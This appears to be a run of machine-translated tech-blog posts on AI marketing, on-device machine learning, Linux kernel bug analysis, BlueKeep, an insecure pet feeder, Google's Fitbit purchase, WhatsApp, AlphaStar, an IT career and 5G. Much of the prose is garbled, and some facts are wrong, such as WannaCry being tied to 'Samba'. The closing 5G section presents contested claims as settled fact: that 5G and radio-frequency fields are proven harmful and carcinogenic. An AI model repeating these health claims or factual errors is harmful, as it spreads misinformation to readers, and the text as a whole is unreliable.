This conclusion was reached by the authors of the research “AI in marketing” from the Segmento advertising platform, who interviewed representatives of the 300 largest advertising companies. 20% of companies said they already use artificial intelligence for marketing purposes, they will join another 32% next year. The remaining 48% of companies refuse to use the technology because they lack the competencies to make a positive decision (33%), it will be difficult to find experienced specialists in the field of AI (27%) until they assess the possibility of using the technology (18%).

The most popular AI-based tools are programmatic purchase of media advertising and retargeting - returning a visitor to the advertiser's website (48% each), chatbots and big data analysis for making management decisions (38% each), personalizing a website or mobile application (29% ) Almost a quarter of companies predict AI customer satisfaction. The technology is least used to offer consumers individual prices for goods and services (5%). Companies also use AI to automate call centers and improve the quality of goods and services.

As a rule, advertisers turn to advertising agencies (47%) and AI-specializing companies (33%) to integrate relevant solutions into the marketing practices of their companies.

“In the case of artificial intelligence, it can be stated that so far the technology solves specific applied problems pointwise, and their spectrum is very limited. For a more substantial and comprehensive integration of AI, companies will have to conduct a global audit of their business processes.

The Present And Future of Machine Learning on Devices

The Present And Future of Machine Learning on Devices

Where we stand at the moment and what will be the future of machine learning on devices in 2020

Machine learning on devices is now developing more and more. Apple mentioned this about a hundred times during WWDC 2019. It's no wonder developers want to add machine learning to their applications.
However, many of these learning models are used only to draw conclusions based on a limited set of knowledge. Despite the term “machine learning”, no learning takes place on the device; knowledge is inside the model and does not improve over time.

Face Detection Technology is available in Smartphones now.

The reason for this is that model training requires a lot of computing power, while mobile phones are not yet capable of this. It’s much easier to train models offline on the server farm, and include all model improvements in the application update.
It is worth noting that training on the device makes sense for some applications, and we believe that over time, such training of models will become as familiar as using models for forecasting. In this context, we want to explore the possibilities of this technology.

Machine Learning Today

The most common applications of deep and machine learning are
•Search Engines like Google, Bing, Yandex etc
•Virtual Personal Assistants like Amazon Alexa, Apple's Siri, Google Now and
•Microsoft's Cortana
•Applications that cannot be programmed
•Self Driving Cars
•Database Mining for growth of automation
•Dynamic Pricing
•Spam Detector
•Google Translate
•Photo tagging Applications
•Online Video Streaming
•Fraud Detection

A modern phone has many different sensors and a fast Internet connection, which leads to a lot of data available for models.iOS uses several models of deep learning on devices: face recognition on photos, phrases " Hello, Siri " and handwritten Chinese characters . But all of these models do not learn anything from the user. Almost all machine learning APIs (MPSCNN, TensorFlow Lite, Caffe2) can make predictions based on user data, but you cannot force these models to learn new from this data.

Now training takes place on a server with a large number of GPUs. This is a slow process requiring a lot of data. The convolutional neural network, for example, is trained on thousands or millions of images. Learning such a network from scratch will take several days on a powerful server, several weeks on a computer and for ages on a mobile device.

Training on the server is a good strategy if the model is updated irregularly and each user uses the same model. The application receives a model update each time the application is updated in the App Store or when new parameters are periodically downloaded from the cloud.
Now training large models on the device is impossible, but it will not always be so. These models should not be large. And most importantly: one model for all may not be the best solution.

Why do I need training on the device?

There are several benefits of learning on the device:

•An application can learn from data or user behavior.
•Data will remain on the device.
•Transferring any process to a device saves money.
•The model will be trained and updated continuously.

This solution is not suitable for every situation, but there are some applications for it. I think that its main advantage is the ability to fit the model to a specific user.

On iOS devices, some applications already do this:

•The keyboard learns from the texts you type and makes assumptions about the next word in the sentence. This model is trained specifically for you, and not for other users. Since training takes place on the device, your messages are not sent to the cloud server .

•The Photos app automatically organizes images into the People album. I'm not quite sure how this works, but the program uses the face recognition API in the photo and places similar faces together. Perhaps this is just uncontrolled clustering, but training should still happen, since the application allows you to correct its errors and is being improved based on your feedback. Regardless of the type of algorithm, this application is a good example of customizing user experience based on their data.

•Touch ID and Face ID learn based on your fingerprint or face. Face ID continues to learn over time, so if you grow a beard or start wearing glasses, it will still recognize your face.

•Motion Detection. Apple Watch explores your habits, such as changing your heartbeat during various activities. Again, I do not know how this works, but obviously, training should take place.

•Clarifai Mobile SDK allows users to create their own classification models for images using photographs of objects and their designations. Typically, the classification model requires thousands of images for training, but this SDK can learn just a few examples. The ability to create image classifiers from your own photos without being an expert in machine learning has many practical uses.

Some of these tasks are easier than others. Often “learning” is simply remembering the last action of the user. For many applications, this is sufficient, and it does not require fancy machine learning algorithms.

The keyboard model is quite simple, and training can take place in real time. The Photo application learns more slowly and consumes a lot of energy, so training occurs when the device is charging. Many practical applications of learning on the device are between these two extremes.
Other existing examples include spam detection (your email client learns from emails that you define as spam), text correction (it examines your most common typing errors and corrects them), and smart calendars like Google Now that learn Recognize your regular activities.

How Far Can We Go?

If the purpose of learning on the device is to adapt the machine learning model to the needs or behavior of specific users, then what can we do about it?
Here's a fun example: a neural network turns drawings into emojis. She asks you to draw several different shapes and teaches the model to recognize them. This application is implemented on the Swift Playground, not the fastest platform. But even under such conditions, the neural network does not learn for long - it takes only a few seconds on the device ( this is how this model works ).

If your model is also not very complex, like this two-layer neural network, you can already conduct training on the device.

Note: on iPhone X, developers have access to the low-resolution 3D model of the user face. You can use this data to train a model that selects emojis or other actions in an application based on the facial expressions of users.

Here are a few other future features:

•-Smart Reply is a model from Google that analyzes an incoming message or letter and offers a suitable answer. She has not yet been trained on the device and recommends the same answers to all users, but (in theory) she can be trained on user texts, which will significantly improve the model.

•-Handwriting recognition that will learn exactly from your handwriting. This is especially useful on the iPad Pro with Pencil. This is not a new feature, but if you have the same bad handwriting as mine, then the standard model will make too many mistakes.

•-Speech recognition, which will become more accurate and tailored to your voice.

•Sleep tracking / fitness apps. Before these apps give you tips on improving health, they need to get to know you. For security reasons, this data is best left on the device

•-Personalized models for dialogue. We have yet to see the future of chatbots, but their advantage is that the bot can adapt to you. When you talk with a chatbot, your device will study your speech and preferences and change the chatbot's answers to your personality and manner of communication (for example, Siri can learn to give less comments).

•-Improved advertising. No one likes advertising, but machine learning can make it less annoying for users and more profitable for advertisers. For example, an ad SDK can learn how often you look and click on an ad, and find the most appropriate ad for you. An application can train a local model that will only request ads that work for a specific user.

•-Recommendations are a common use of machine learning. The podcast player can learn from the programs you listened to for advice. Now applications perform this operation in the cloud, but this can be done on the device.

•-Applications for people with disabilities can help them navigate the space and better understand it. I do not understand this, but I can imagine that applications can help, for example, distinguish between different drugs using the camera.

These are just a few ideas. Since all people are different, machine learning models could adapt to our specific needs and desires. Training on the device allows you to create a unique model for a unique user.

Different scenarios of model training
Before applying the model, you need to train it. Training needs to be continued further to improve the model.

There are several training options:

•Lack of training on user data. Collecting your own data or using publicly available data to create a single model. When improving the model, you release an application update or simply upload new parameters to it. Most existing machine learning applications do this.

•Centralized training. If your application or service already requires data from the user that is stored on your servers, and you have access to them, then you can carry out training based on this data on your server. User data can be used for training for a specific user or for all users. This is what platforms like Facebook do. This option raises questions related to privacy, security, scalability, and many others. The issue of privacy can be solved by Apple’s “selective privacy” method, but it also has its consequences .

•Collaborative learning. This method transfers training costs to the users themselves. Training takes place on the device, and each user trains a small part of the model. Model updates are sent to other users, so that they can learn from your data, and you from them. But this is still a single model, and all end up with the same parameters. The main advantage of such training is its decentralization . In theory, this is better for privacy, but, according to research , this option may be worse.

•Each user learns his own model. In this option, I personally am most interested. The model can learn from scratch (as in the example with drawings and emoji) or it can be a trained model that is customized to your data. In any case, the model can be improved over time. For example, a keyboard starts with a model already trained in a particular language, but over time learns to predict which sentence you want to write. The downside of this approach is that other users cannot benefit from it. So this option only works for applications that use unique data.

How to carry out training on the device?

It is worth remembering that training on user data is different from training on a large amount of data. The initial keyboard model can be trained on a standard body of texts (for example, on all Wikipedia texts), but a text message or letter will be written in a language that differs from a typical Wikipedia article. And this style will be different from user to user. The model should include these kinds of variations.
The problem also is that our best deep learning methods are quite inefficient and rude. As I said, training an image classifier can take days or weeks. The learning process, stochastic gradient descent, goes through small stages. There can be a million images in a data set, each of which a neural network will scan about a hundred times.

Obviously, this method is not suitable for mobile devices. But often you do not need to train the model from scratch. Many people take an already trained model and then use transfer learning based on their data. But these small data sets still consist of thousands of images, and even so learning is too slow.

With our current teaching methods, setting up models on the device is still far away. But not all is lost. Simple models can already be trained on the device. Classical machine learning models such as logistic regression, decision tree, or naive Bayesian classifier can be quickly trained, especially when using second-order optimization methods such as L-BFGS or conjugate gradient. Even a basic recurrent neural network must be available for implementation.

For the keyboard, the online learning method may work. You can conduct a training session after a certain number of words typed by the user. The same applies to models using an accelerometer and motion information, where the data comes in a constant stream of numbers. Since these models are trained on a small part of the data, each update should occur quickly. Therefore, if your model is small and you do not have much data, then training will take seconds. But if your model is larger or you have a lot of data, then you need to be creative. If a model studies the faces of people in your photo gallery, it has too much data to process, and you need to find a balance between the speed and accuracy of the algorithm.

Here are some more problems that you will encounter while learning on the device:

•Large models. For deep learning networks, current learning methods are too slow and require too much data. Many studies are now devoted to training models on a small amount of data (for example, on one photo) and in a small number of steps. I’m sure that any progress will lead to the spread of training on the device.

•Multiple devices. You are probably using more than one device. The issue of transferring data and models between user devices remains to be resolved. For example, the “Photos” application in iOS 10 does not transmit information about people's faces between devices, therefore it is trained on all devices separately.

•Application Updates. If your application includes a trained model that adapts to user behavior and data, then what happens when you update the model with the application?

Learning on the device is still at the beginning of its development, but it seems to me that this technology will inevitably become important in creating application

The Future Trends of Machine Learning in 2020

Machine Learning Trend To Find Bugs

Machine Learning Trend To Find Bugs

Can we find bugs in program through Machine Learning?

Automated bug detection before the actual program running is increasingly popular feature researchers are looking for.Programming errors and other code quality issues determination is in search of big lead here i.e finding errors in the Linux kernel before the code is incorporated, probably not but can only be possible with machine learning.

Using AI, Linux kernel developer Sasha Levin looks for patches for the the Stable and Long Term Stable (LTS) trees that improve code. But did he use the ML system to find patches that contain bugs? It’s a difficult task for Levin, but he has some clues as to how that could be done.

The Microsoft employed developer Sasha Levin maintains together with Greg Kroah-Hartman the so-called stable trees of the Linux kernel. Among other things, Levin uses a machine learning approach to find the necessary patches for improvement . As the developer reported in his presentation at this year’s Open Source Summit Europe in Lyon, he had been repeatedly asked because of his work, whether it could not be found bugs before they are even incorporated into the kernel. The answer is, according to Levin, but anything , as he presents in a detailed analysis.

Because, as many developers know, detecting bad code is not a manageable task. Although there are already a variety of tools for finding errors, such as static code analysis. But from the point of view of Levin, the biggest source of error in the development of the Linux kernel is its development process itself. The developer tries to underpin this with his own analysis.

Objective analysis is difficult to implement

From his personal experience as a maintainer. Levin knows this review, that is, third-party checking of the code, as well as code testing, help prevent the introduction of bugs. It plays quite a role, who does the review, how much time it takes or even how extensively the possible disputes are formulated.

Although it is difficult to actually quantify these and other things. This applies above all to the question as to what should be considered as a bug in the sense of the original question and investigation. Nevertheless, Levin has tried to translate some of these considerations into a machine-learning model using a preselected set of code contributions to the kernel.

Of course, the model inevitably has weaknesses and can not be used directly to actually find faulty code before it is entered into the main branch / tree of the kernel. For Levin, however, the investigation thus carried out offers some very important clues.

Fast patches just before the deadline have more bugs

Probably the most important finding here, according to Levin, is that the probability of introducing errors in contributions is three times higher than normal if the code is added to RC kernels late. This seems counterintuitive, as after a two-week phase to submit new features for the upcoming Linux version (Merge Window), a mostly eight-week trial phase with bug fixes and release candidates (RC) follows, before a new Linux version appears ,

According to Levin, this result confirms his assumptions about the reviews. Thus, new features and major changes often go through a long review phase and the patches are usually discussed extensively. However, in the late RC phase of kernel development, the process of implanting is much faster and often there is no review at all.

Levin found a lot of patches for this development phase, the code of which was written, submitted and entered on a single day. Of course, with such a rapid development, the potential for error increases.

Whether and what follows from this realization but in the long term for the development process of the Linux kernel is not really clear for Levin. He had some ideas, but these were difficult to implement. This includes a real freeze phase in the development to extensively test the innovations. Possibly shifts the inclusion of short-term patches but only further back.

Similarly, Levin could imagine a kind of standardized approach to accepting patches in the main branch. As a prerequisite for a recording this could be a minimum number of days that the patches in the Linux Next branch must be present before inclusion in the main branch. Similarly, extensive reviews or tests could be forced or so-called sign-off tags. The latter in this case would be roughly “approved by” .

All these requirements would, according to Levin with a not inconsiderable share of developers and maintainers encounter resistance and are therefore not feasible.

Researchers are also using machine learning for finding trends. Here are takeaways From The First Operational ML Conference USENIX OpML 2019


2019 Onward: Everyday Is Information Cyber Security Day

2019 Onward: Everyday Is Information Cyber Security Day

5G, AI and IoT driven Industrie 4.0 has biggest challenge ahead and that is implementing industrial graded security systems. Smart cities, autonomous vehicles and Nuc plants just imagine the importance of computer network systems security and impact of any cyber attack. World cyber security day, week and month November 2019 is here to highlight the importance of this challenge that we are going to face in future.Talks, demo, conferences, and an AI, 5G,IoT Hackathon will compose the month of cyber security.

During all these awareness efforts we are here, Windows ‘BlueKeep’ CyberAttack Is Happening Right Now.

Even That U.S. Government has warned us about the devastating risks of BlueKeep a security vulnerability that was discovered in Microsoft's Remote Desktop Protocol implementation, which allows for the possibility of remote code execution.

As a vulnerability such as Wanna Cry describes Microsoft Bluekeep. Now security researchers discovered the first malware that exploits the gap. However, this is still a long way from the worst-case scenario.

Already in May, Microsoft vigorously warned of a vulnerability that could spread like Wanna Cry independently. For the first time, security researchers Kryptos Logic have been able to sift through malicious software that exploits the Bluekeep gap. However, it seems almost harmless to the potential of the vulnerability.

Since Microsoft released security updates in May for all supported and even unsupported operating systems, there was silence before the storm. A wave of attack on unprotected devices that did not play the security updates was just a matter of time. Gradually, security researchers also released proof of concepts (PoC) or even exploits for pentesting software. But the big attack was slow is coming.

For the first time, security researchers discovered malicious software in the wild, exploiting the Bluekeep vulnerability. In a honeypot, a computer with vulnerabilities run by security researchers to detect and analyze malicious software, they discovered malicious software that used the loophole to steal computing power. This used the malicious software for cryptomining. However, the malicious software crashed the affected Honeypot, so security researchers doubt the reliable functioning of the malicious software.

The Bluekeep Cryptominer is not a worm

The Bluekeep vulnerability allows malicious code to be executed on an affected Windows system without the need for system authentication or user interaction. A computer worm could self-propagate through the vulnerability from vulnerable computer to vulnerable computer. However, according to the security researchers, the malicious software that has now been discovered does not spread on its own. Instead, the attackers scan for vulnerable systems and then attack them.

One reason for the absence of a Blueekeep worm could be Microsoft's handling of the vulnerability. Security updates and warnings from Microsoft may have contributed to significantly reducing vulnerable devices. "Every month that passes without a worm being released, more people are turning to security updates and the number of vulnerable devices is falling," said security researcher Jake Williams Wired. That so far no attacker had exploited the gap on a large scale, could also be based on a cost-benefit calculation. There may be too little affected Windows machines, as that is worth the effort, explains Williams.

In contrast, Wanna Cry paralyzed millions of Windows machines in 2017 , leading to system failures at a number of companies . In addition to the scoreboards of the train denied many money, ticket and gas station machines the service. Calculator of the mobile operator Telefónica were also affected, and the car manufacturer Renault had stopped its production in some plants as a precaution. The Wanna Cry malware was based on a vulnerability in Samba hoarded by the US National Security Agency (NSA), leaked by the hacker group The Shadow Brokers .

Russian Security Researcher Accessed Xiaomi Furry Tail Pet Smart Feeder

Russian Security Researcher Accessed Xiaomi Furry Tail Pet Smart Feeder

Xiaomi Furrytail Feeder in crowdfunding, the smart food distributor allows us to feed our pets remotley with schedule, using Internet Of Things IoT Technology. A Russian security researcher was able to view and control around 11,000 devices worldwide via API.

So much for things like this were only happening in the movies, Now it is getting real.

Xiaomi’s Furrytail smart pet food station can automatically feed pets at certain times, such as when the pet owner is away from home. The devices are however badly secured. By accident, Russian security researcher Anna Prosvetova found that she had access to over 10,000 furrytail devices. In addition to the feed rations, the security researcher could also have changed the firmware of the devices. Although the feed station Furrytail comes from the same manufacturer, it is sold under the brand Xiaomi. First it was reported in the Russian blog Habr.

The approximately $ 80 Furrytail feeding station is suitable for dogs and cats. You can set the amount of feed and times per app. Through the device API, Prosvetova was able to see 10,950 active furrytails worldwide. She could have fed the pets of the app owners at the touch of a button or could change the feed rations, said the security researcher. A password would not have needed it. In addition, it would be possible to play a modified firmware on the devices and thus take over permanently. These can then be misused for example for DDoS attacks.

The security researcher initially did not want to post more details about the vulnerabilities to give the manufacturer the ability to shut them down. She reported the gaps about a week ago. According to an e-mail published by Prosvetova, Furrytail has announced an update. However, the security researcher does not receive a bug bounty, the e-mail states. So far, the manufacturer has not set up a corresponding program.

One thing is interesting here that Xiaomi as the manufacturer of the Furrytail, the feed station is indeed sold under the brand Xiaomi, but the device is manufactured by Furrytail. Xiaomi said: “The smart animal feed station Furrytail does not belong to Xiaomis product plate, but comes from a third party manufacturer”. The security researcher had also turned not to Xiaomi, but to the furrytail manufacturer. Xiaomi has been operating a bug bounty program since 2013.

Google is Buying Fitbit: Now What?

Google is Buying Fitbit: Now What?

Simple answer to this question is, What are you wearing on your wrist? Thats the main reason for this deal that Google was outranked by Apple due to Apple Watch (the hardware part) where people were switching from android to Apple. Health and Fitness industry is driving force here.

Fitbit one of the largest companies in wearable technology devices field, snapped up by Google and worries for Xiaomi and Apple.At the moment Google Fitbit acquisition is pending regulatory approval.

Google is buying Fitbit: Now What?

After getting Fitbit, big G is going to challenge Apple and Xiaomi in the field of fitness wearable products.Another untapped area for Google that got her attention now.

Google is very aggressive to expand business and also in talks about buying Firework, a video-sharing startup that is a rival to TikTok.

Google is concerned about Tiktok’s growing popularity and wants to buy Firework. During the downloads, the short video social app was in front of Youtube or Whatsapp.

Google has been discussing the purchase of the short video social platform Firework, a competitor of Tiktok. The Wall Street Journal reports , citing informed circles. Firework, based in Redwood City, California, was valued at over $ 100 million in a round of financing earlier this year. A purchase price would usually be higher.

Google and Firework have not yet discussed the price of a takeover, according to the report. The negotiations may not lead to agreement and there is a possibility that the companies will only become partners.

Also, Weibo, the Chinese Twitter competitor, is interested in Firework, even if the negotiations are not as advanced according to informed circles as with Google.

Video portals for short playback clips and other videos are popular with kids and teens. The Chinese short video app Douyin, known abroad as Tiktok, is an offer of the company. According to the Analytics platform Sensor Tower, Tiktok’s monthly downloads were ahead of Whatsapp, Youtube and Google Maps. According to media reports, the playback app Musical.ly was acquired by By tedance in November 2017 for around $ 800 million and merged with Tiktok. At Musical.ly, the lips are to be moved in sync to songs or movie quotes in a maximum of 15 seconds long clips.

Tiktok’s parent company, Bytedance, based in Beijing, has a value of $ 75 billion. Facebook responded to Tiktok’s growing popularity in 2018 with the Lasso app. Snap has also introduced new features.

Firework was founded last year by former executives of Snap, Linkedin and JPMorgan Chase. Earlier this year, Firework received approximately $ 30 million from venture capital firms such as IDG Capital, GSR Venture and Light speed Venture Partners China.

Small Companies being bought out:

It is always a good deal for large organisations to acquire smaller firms because of two main factors, 1 | Low Risk & 2) Exponential Growth.

Improved buying power, resources of a larger company, established sales processes, new customer relationships, additional management resources, etc. all tools designed to improve the financial position of the newly acquired business.So big companies buy small companies.

Privacy and Security is in WhatsApp’s DNA

Privacy and Security is in WhatsApp’s DNA

Another Step to make Whatsapp Secure and Private

Facebook owned encrypted WhatsApp Messenger is a freeware, cross-platform messaging and Voice over IP service but not flawless.Recently many security experts report in 2019 after disclosing vulnerabilities in this messaging app that can be exploited by attackers. Illegal access to mobile through whats-app can leave users open to harmful consequences. We have already seen hacking of a wider group of top government official’s smartphones, sophisticated nation-state attacks, targeted hacking and misleading functionality through WhatsApp cyber intrusion.

Mark Zuckerberg is trying hard to make billions of subscribers on Whatsapp secure.As per WhatsApp,

Privacy and security is in their DNA, So fingerprint unlock security feature finally arrives for Android users after iOS.

Fingerprint lock comes for Android Whatsapp

So far, only iPhone users could lock Whatsapp with Face ID or the fingerprint sensor – now comes the function for Android devices. On which devices the security option will work is not yet clear.

Whatsapp has announced that in future Android users could block the chat program on their smartphone by fingerprint. In early 2019 Whatsapp had already released the feature for iPhones, now followed by Android smartphones.

In a blog post, the company writes that the fingerprint lock is offered for “supported Android phones” . Which devices are involved, is not communicated. Apparently Whatsapp – unlike the iPhone – even with a fingerprint lock, but not via a face scan.

To enable it, tap Settings >Account > Privacy > Fingerprint lock. Turn on Unlock with fingerprint, and confirm your fingerprint.

Apparently no authentication by face scan possible

Whatsapp writes that for Android a “similar authentication” will be introduced and speaks in the consequence only of the release by a fingerprint. Accordingly, we can not use the lock on the Pixel 4 XL in our editors. Whether Whatsapp still provides an unlock by facial scan, is currently unknown.

The lock can be set to be reactivated immediately after leaving Whatsapp, after one minute, or after 30 minutes. In addition, users can choose whether or not to display message content in Android notifications.

Apparently the update will ship with the new fingerprint lock in waves. Likewise, some users may take a little longer than others to use the feature.

AI vs. Human

AI vs. Human

AI vs. Human Intelligence is a fair matchup or not ?

Should we stop thinking AI vs. Human, Think AI With Human ?

Mostly experts are having of the view that artificial intelligence (AI) is completely an automated process without any human intervention, but in reality most of the input gained by AI based systems are from humans. Concern, that AI will replace human beings in the digital workplace, is more closer to reality and it is also likely that humans and machines will work together.

This time under the subject " ai vs human " another test is carried out by DeepMind on its artificial intelligence agents that were trained to play the Blizzard Entertainment game StarCraft II.

Test environment was Google-owned AI lab that is more sophisticated one and software, still called AlphaStar, is now grandmaster level in this real-time strategy game.It is capable of beating 99.8 percent of all human players in competition.

Starcraft AI is already among the best players.

Deepmind's AI Alphastar started small. Meanwhile she plays in the Grandmaster Ladder against the best human Starcraft 2 players. The system dominates Terrans, Protoss and Zerg - each as its own neural network.

Deepmind's AI system Alphastar is already superior to about 99.8 percent of all active players in the real-time strategy game Starcraft. Meanwhile, it plays in the competitive ladder system at the highest level: Grandmaster. Professional players who also play for prize money in tournaments move on this level. Interesting: Alphastar now dominates all three playable races - Terrans, Protoss and Zerg - and should have developed according to the developers against all three races tactics.

For each of the three quite different fractions, the program uses a self-contained neural network with its own weights and training data. The current version of Alphastar has also incorporated some predetermined limits. For example, the AI ​​does not see through the fog of war and has to explore the playing card, analyze the base of the opponent and develop strategies against it. In addition, the system may execute a maximum of about 264 actions per minute.

Since the summer of 2019 , Alphastar plays in the European ladder against human players. However, the program does not pretend to be undetected and plays with several agents in parallel. Some community members such as the Youtuber LowkoTV have probably already played against the program. Partly very unconventional tactics reveal the software. He was also struck by the fact that Alphastar agents always play exactly 50 games within a few hours at a time.

German Starcraft player Dario Wünsch - Liquid TLO - works with Deepmind and was involved in the training of Alphastar. "While Alphastar has excellent and precise control, it does not feel superhuman," he says. However, this software is not perfect yet. Although she can quickly play against different versions of herself and evaluate this, but there is a risk that Alphastar forgot ways of playing past matches again.

The team at Deepmind continues to work on his project. The developers even see the approach as universally applicable - for example in games other than adaptive computer opponents.

Public Sector vs Private Sector For IT Professional in EU

Public Sector vs Private Sector For IT Professional in EU

Mainly, it was my mother who pushed me into a job with a government agency , even though it's my dad who works in public service. Safe job, said my mother, totally relaxed work, good training opportunities, regular salaries and work just five kilometers from home. For the old place I had to drive for an hour. I made the mistake and listened to my mother.

I do not want to give my name, because that would only cause trouble. Maybe at home, possibly by the authority I was with, possibly with my current employer, because I could be considered as a nefarious person. Therefore, I remain anonymous, but I assure you that I exist and that everything is right, of which I report. *

Techie in training

Although I am a nerd, but in a positive sense of the term computer geek. Because I do not lack social contacts and I'm not a nerd who spends his life behind the computer. Information technology simply fascinates me. Already as a child I dismantled Windows computers and reassembled them. I supported friends' computers, of course remotely, because in the early 2000s it was the coolest way to remotely help with computer problems.

Later, I turned my hobby into a profession and completed my apprenticeship as a specialist for system integration after my technical college entrance qualification. That was in the beginning of 2017. I'm born in 1992. I did not start my apprenticeship until the age of 21, before that pretty much everything went through school forms, which is conceivable and feasible: from high school to vocational school, there the Hauptschul-, Realschulabschluss and finally the Fachhochschulreife specializing in technology.

My apprentice company was a small mechanical engineering company. Nearly 150 employees and owner-managed. That was really fun, especially for the company. The owners were older, but super-loyal and with heart and soul for their company and employees. I felt in good hands and professionally professionalized my knowledge of hobby. As an apprentice, I sometimes had to clean up the boxes of new computers, but mainly I was integrated into the corporate processes and used in the Support Level 1 and 2 already from the first year of apprenticeship.

To differentiate competencies, support is divided into three levels: first, second, and third-level support. The latter requires the highest expertise. In my apprenticeship we were six IT apprentices. Two were taken, four had to go, including me. What was not about me or the other three: The business situation was not good at the time.

The job prospects are not as rosy as everyone says

After that, I spent three months with an IT service provider in user support. A small company with eight men. I felt constantly watched and monitored, had to settle accounts with the customer every minute. The job was stressful, ungrateful and poorly paid. That's why I applied for job advertisements and quickly found a new job, but in the form of temporary employment. Some say temporary work or temporary work.

I was used by the Temporary Employment Agency for a customer's IT support in levels 1 and 2 again. This was a medium-sized production company with 1,400 employees. Five months later, the company took over me indefinitely.

In my experience, the job prospects for IT professionals are not as bright as they are everywhere, even in economically strong regions. Before you get a firm contract, you have to prove yourself, even if you have a completed vocational training with work experience. I was in the company for a year, then I followed my mother's advice.

Up on Papers, Dropped off in Everyday Life

I got the job in the office surprisingly fast. In the public service Germany are desperately looking for ITler. Private companies hunt candidates down with much better salaries. The office was a small, rural authority. Everyone was already in such offices, in which ID cards are extended, married or excerpts of land maps are created. My job was again the user support, for the first time from level 1 to 3, so in full. On the paper I had risen professionally. But in everyday life fell deeply.

Welcome to the Stone Age Support!

The internal organization in the agency was pure chaos. There was no ticket system for support, almost everything stored in Word and PDF files. Welcome to the Stone Age Support! After some time I got married and suggested to the team leader to introduce a ticket system. It was supposed to facilitate work distribution and support organization, especially because we were five in the IT team across five locations.

I also suggested setting up a centralized hotline to help our colleagues with IT issues. In addition, I advised to use a document management system to centralize knowledge in our operations and to break it down into processes. The first attempt at change failed because my team leader had a great deal of IT understanding but did not want to change his way of working and that of the team.

The man is over 50 and has been in public service for 25 years. He was always friendly and always available for problems or questions. But when it came to changes in work processes, he was fundamentally skeptical. The chaos had become a daily routine and without chaos he would probably have missed something fundamental.

A few weeks later a meeting of several dozen IT members of all kinds of authorities took place, organized by the higher authority. The proposed the introduction of a ticket system, but there were too many votes. That's why the topic was suspended.

I quit shortly thereafter, ending the nightmare public service after half a year. The job demotivated me, bored and made me doubt myself. Since then I have a certain aversion to job offers from the civil service.

Work like chewing gum

My authority has definitely worked less than in the private sector. If a colleague had problems with his computer, the solution was not really urgent. People are used to killing their time. I had nothing left to do on several days of the week afternoon because I'm not the type to do a lot of work over the long day so there's always something to do.

Out of boredom, I once disposed of the cardboard from a truckload of new PCs until a colleague has advised me that it is the caretaker's responsibility. Otherwise he has nothing more to do. In order not to have to kill time meaninglessly, I have partly trained privately during working hours or read professional articles. For this we were even asked by the supervisor. Maybe because it's less obvious then that you have nothing to do. So you at least staring at the screen. People who can not be put under pressure and who can work for a long time like chewing gum fit in with an authority.

Everything Takes Time

Less work - less money. You'd think that's fair. But it is not. In big and important authorities, which are mostly located in centers, the IT-people have to do a good job, which I have learned in cooperation with higher-level bodies. However, they earn as much as an IT person in a small office in the province. Authorities flat-rate everything. That's a big problem for the employees there.

Also the bureaucracy. Everything takes longer in office than in private companies. The fewest employees have service cell phones, in the offices there is no WLAN and almost no authority is active in the social networks, for example for personnel recruiting. But for young people like me, that's the second home. The staff council of the authority, I once suggested to seek new employees in social media. That was rejected immediately.

My current employer found me there. Since March of this year I have been working in the foundation of a well-known IT pioneer in Germany, also in extensive IT support. A foundation is the ideal mix of public service and business: there is no pressure to earn money, but enough money for IT. This combination ensures a relaxed work and interesting tasks, in this I have found the right professional balance for me. The proximity to home is not so important anymore: For this job and my girlfriend, I moved away 500 kilometers from home.

Scientists Warn of Health Risks From 5G

Scientists Warn of Health Risks From 5G

5G Health Risks:International Appeal Calls for a 5G Moratorium

International scientists and physicians warn against the health risks of the 5G mobile communications standard and demand a moratorium. They call for technology review, setting new, safe “maximum overall exposure limit” limits for all wireless communications, and expanding wired digital telecommunications.

” Scientists warn of potentially serious health effects of 5G cellular technology “

More than 180 signatory scientists and physicians of 36 countries, recommend a moratorium on the expansion of the fifth generation of telecommunications until potential risks to human health and the environment have been fully explored by industry-independent scientists. 5G will greatly increase exposure to high-frequency electromagnetic fields (RF-EMF) by adding it to GSM, UMTS, LTE, WLAN, etc. already used for telecommunications. It has been proven that HF-EMF is harmful to humans and the environment.5G leads to a massive increase in forced exposure through wireless communication.

The 5G technology works only over short distances. Due to solid material, the signals are transmitted poorly. Many new antennas will be needed, and the full rollout will result in antennas in urban areas spaced from 10 to 12 homes. Therefore, the forced exposure is greatly increased.

With “the ever-increasing use of wireless technologies,” nobody can avoid an exposure. In addition to the increased number of 5G base stations (even within homes, shops and hospitals), “10 to 20 billion wireless connections” (from refrigerators, washing machines, surveillance cameras, self-driving cars and buses, etc.) are part of the Internet of Things be. All this together can lead to an exponential increase in the total long-term exposure of all EU citizens to radio frequency electromagnetic fields (RF-EMF).

Harmful effects of HF-EMF have already been proven Over 230 scientists from more than 40 countries have expressed their “serious concern” regarding the ubiquitous and increasing exposure to electromagnetic fields from electrical and wireless devices, even before the addition of 5G. They refer to the fact that “numerous recent scientific publications have shown that electromagnetic fields affect living organisms, even at intensities well below most international and national limits.” The effects include increased cancer risk, cell stress, an increase in harmful free radicals, genetic damage, structural and functional changes in the reproductive system, learning and memory deficits, neurological disorders, as well as adverse effects on general well-being in humans. Damage does not just affect humans. There are increasing ones Evidence of adverse effects in plants and animals .

After the scientist’s appeal was written in 2015, additional research has confirmed the serious health risks associated with RF EMF from wireless technology. The (US $ 25-million) National Toxicology Program (NTP) study , the largest in the world, shows a statistically significant increase in the incidence of brain and heart cancer in animals exposed to electromagnetic fields below the ICNIRP. Limit values (ICNIRP, International Commission on Non-Ionizing Radiation Protection). These limits apply in most countries. These results support the findings in human epidemiological studies to high-frequency radiation and the brain tumor risk. A large number of peer-reviewed scientific reports show damage to human health from electromagnetic fields.

The International Agency for Research on Cancer (IARC), the World Health Organization (WHO) cancer research agency, concluded in 2011 that electromagnetic fields of frequencies ranging from 30 KHz to 300 GHz may be carcinogenic to humans (Group 2B). However, new studies, such as the NTP study mentioned above, as well as several epidemiological studies, such as the most recent studies on cell phone use and brain cancer risks, confirm that radio frequency radiation is carcinogenic to humans.

The EUROPAEM EMF guideline 2016 states that “There is strong evidence that long-term exposure to certain EMFs is a risk factor for diseases such as certain cancers, Alzheimer’s and male infertility. Common symptoms of EHS include headache, difficulty concentrating, sleep disorders, depression, lack of energy, fatigue, and flu-like symptoms. “
